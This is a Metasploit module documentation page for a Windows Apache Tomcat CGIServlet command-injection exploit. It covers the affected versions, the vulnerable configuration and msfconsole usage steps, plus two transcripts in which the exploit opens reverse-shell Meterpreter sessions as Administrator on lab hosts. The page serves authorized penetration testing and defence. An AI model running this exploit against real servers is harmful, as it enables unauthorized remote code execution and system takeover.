metasploit-framework/tomcat_cgi_cmdlineargs.md at master

6.8 KiB

Raw Permalink Blame History

Description

This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the enableCmdLineArguments setting is set to true, a remote user can abuse this to execute system commands, and gain remote code execution.

Vulnerable Application

The following versions of Apache Tomcat on Windows are effected:

9.0.0.M1 to 9.0.17
8.5.0 to 8.5.39
7.0.0 to 7.0.93

Also, the machine needs to enable the enableCmdLineArguments option in conf\web.xml. For example:

<servlet>
<servlet-name>cgi</servlet-name>
<servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
<init-param>
  <param-name>cgiPathPrefix</param-name>
  <param-value>WEB-INF/cgi</param-value>
</init-param>
<init-param>
  <param-name>executable</param-name>
  <param-value></param-value>
</init-param>
<init-param>
  <param-name>enableCmdLineArguments</param-name>
  <param-value>true</param-value>
</init-param>
<load-on-startup>5</load-on-startup>
</servlet>

Also:

<servlet-mapping>
<servlet-name>cgi</servlet-name>
<url-pattern>/cgi/*</url-pattern>
</servlet-mapping>

Next, modify the conf\context.xml file replacing <Context> with <Context privileged="true">

Finally, a script needs to be available in the webapps\ROOT\WEB-INF\cgi directory. For example:

@echo off
echo Content-Type: text/plain
echo.
echo Hello, World!

Verification Steps

Start msfconsole
Do: use exploit/windows/http/tomcat_cgi_cmdlineargs
Configure rhosts
Configure TARGETURI
Set a payload
Run the module, you should get a session.

Scenarios

Apache Tomcat 9.0.17 with JDK 8 on Windows 10 Pro (x64)

Check Method

The check method of the exploit explicitly triggers the bug to verify the vulnerable, therefore it should be accurate. To use it, here is an example:

msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check
[+] 172.16.135.141:8080 - The target is vulnerable.

Code Execution

msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > exploit

[*] Started reverse TCP handler on 172.16.135.1:4444 
[*] Checking if 172.16.135.141 is vulnerable
[*] 172.16.135.141 seems vulnerable, what a good day.
[*] Command Stager progress -   6.95% done (6999/100668 bytes)
[*] Command Stager progress -  13.91% done (13998/100668 bytes)
[*] Command Stager progress -  20.86% done (20997/100668 bytes)
[*] Command Stager progress -  27.81% done (27996/100668 bytes)
[*] Command Stager progress -  34.76% done (34995/100668 bytes)
[*] Command Stager progress -  41.72% done (41994/100668 bytes)
[*] Command Stager progress -  48.67% done (48993/100668 bytes)
[*] Command Stager progress -  55.62% done (55992/100668 bytes)
[*] Command Stager progress -  62.57% done (62991/100668 bytes)
[*] Command Stager progress -  69.53% done (69990/100668 bytes)
[*] Command Stager progress -  76.48% done (76989/100668 bytes)
[*] Command Stager progress -  83.43% done (83988/100668 bytes)
[*] Command Stager progress -  90.38% done (90987/100668 bytes)
[*] Command Stager progress -  97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 172.16.135.141
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.141:51982) at 2019-06-18 15:26:54 -0500
[*] Command Stager progress - 100.02% done (100692/100668 bytes)

meterpreter > 
[!] Make sure to manually cleanup the exe generated by the exploit

Tomcat 8.5.20 with JDK 1.8.0_211-b12 on Windows 2012 (Build 9200)

msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check
[+] 2.2.2.2:8080 - The target is vulnerable.
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Checking if 2.2.2.2 is vulnerable
[*] 2.2.2.2 seems vulnerable, what a good day.
[*] Command Stager progress -   6.95% done (6999/100668 bytes)
[*] Command Stager progress -  13.91% done (13998/100668 bytes)
[*] Command Stager progress -  20.86% done (20997/100668 bytes)
[*] Command Stager progress -  27.81% done (27996/100668 bytes)
[*] Command Stager progress -  34.76% done (34995/100668 bytes)
[*] Command Stager progress -  41.72% done (41994/100668 bytes)
[*] Command Stager progress -  48.67% done (48993/100668 bytes)
[*] Command Stager progress -  55.62% done (55992/100668 bytes)
[*] Command Stager progress -  62.57% done (62991/100668 bytes)
[*] Command Stager progress -  69.53% done (69990/100668 bytes)
[*] Command Stager progress -  76.48% done (76989/100668 bytes)
[*] Command Stager progress -  83.43% done (83988/100668 bytes)
[*] Command Stager progress -  90.38% done (90987/100668 bytes)
[*] Command Stager progress -  97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 2.2.2.2
[*] Command Stager progress - 100.02% done (100692/100668 bytes)
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49612) at 2019-06-24 20:44:45 -0400

meterpreter > 
[!] Make sure to manually cleanup the exe generated by the exploit
dir
Listing: C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi
=====================================================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   0      dir   2019-06-24 20:44:19 -0400  %SystemDrive%
100777/rwxrwxrwx  73802  fil   2019-06-24 20:44:19 -0400  dKASF.exe
100777/rwxrwxrwx  67     fil   2019-06-20 21:52:49 -0400  example.bat
100777/rwxrwxrwx  69     fil   2019-06-24 15:15:13 -0400  test.bat

meterpreter > sysinfo
Computer        : WIN-EDKFSE5QPAB
OS              : Windows 2012 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN-EDKFSE5QPAB\Administrator
meterpreter > shell
Process 3256 created.
Channel 1 created.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi>cd ..\..\..\..\bin
cd ..\..\..\..\bin

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>catalina.bat version
catalina.bat version
Using CATALINA_BASE:   "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_HOME:   "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_TMPDIR: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\temp"
Using JRE_HOME:        "C:\Program Files\Java\jdk1.8.0_211"
Using CLASSPATH:       "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\bootstrap.jar;C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\tomcat-juli.jar"
Server version: Apache Tomcat/8.5.20
Server built:   Aug 2 2017 21:35:49 UTC
Server number:  8.5.20.0
OS Name:        Windows Server 2012
OS Version:     6.2
Architecture:   amd64
JVM Version:    1.8.0_211-b12
JVM Vendor:     Oracle Corporation

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>

6.8 KiB Raw Permalink Blame History